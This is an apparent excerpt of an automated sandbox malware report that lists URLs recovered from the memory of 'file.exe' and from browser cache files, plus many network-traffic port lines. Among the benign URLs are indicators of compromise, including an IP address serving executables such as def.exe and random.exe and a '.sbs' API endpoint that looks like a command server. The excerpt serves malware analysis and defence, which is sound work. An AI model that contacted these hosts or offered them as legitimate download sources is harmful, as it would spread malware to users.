        Source: file.exe, 00000003.00000003.1640714280.00000000005AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
        Source: file.exe, 00000003.00000003.1640714280.00000000005AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/D
        Source: file.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.0000000000582000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
        Source: file.exe, 00000003.00000003.1651025033.000000000530E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1640643368.0000000005302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeb
        Source: file.exe, 00000003.00000002.1728895509.00000000001DA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
        Source: file.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exes
        Source: file.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.0000000000582000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
        Source: chromecache_112.12.drString found in binary or memory: http://schema.org/Organization
        Source: file.exe, 00000003.00000003.1551682514.000000000058C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://aka.ms/certhelp
        Source: chromecache_112.12.dr, chromecache_113.12.drString found in binary or memory: https://aka.ms/feedback/report?space=61
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://aka.ms/msignite_docs_banner
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://aka.ms/pshelpmechoose
        Source: chromecache_112.12.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
        Source: chromecache_112.12.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
        Source: chromecache_112.12.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://channel9.msdn.com/
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/Thraka
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/Youssef1313
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/adegeo
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://github.com/dotnet/try
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/gewarren
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://github.com/js-cookie/js-cookie
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/mairaw
        Source: chromecache_112.12.drString found in binary or memory: https://github.com/nschonni
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
        Source: chromecache_112.12.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
        Source: file.exe, file.exe, 00000003.00000003.1641038627.0000000000536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.000000000058C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
        Source: file.exe, 00000003.00000003.1484646508.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1640784527.000000000058D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.000000000058C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1433137146.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464672003.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1433102979.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1381575345.000000000530A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiU
        Source: file.exe, 00000003.00000003.1466792938.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1465202357.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464672003.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551875812.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiYRs78O
        Source: file.exe, 00000003.00000003.1484947321.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1484646508.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiYRs78Oc
        Source: file.exe, 00000003.00000003.1465143401.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1485421825.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1640987678.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464928926.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api&t
        Source: file.exe, 00000003.00000003.1640714280.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1429934076.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464672003.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1430189557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651046664.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1484947321.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1466756787.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1430094295.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1485058236.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apig
        Source: chromecache_104.12.drString found in binary or memory: https://schema.org
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
        Source: chromecache_104.12.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: file.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
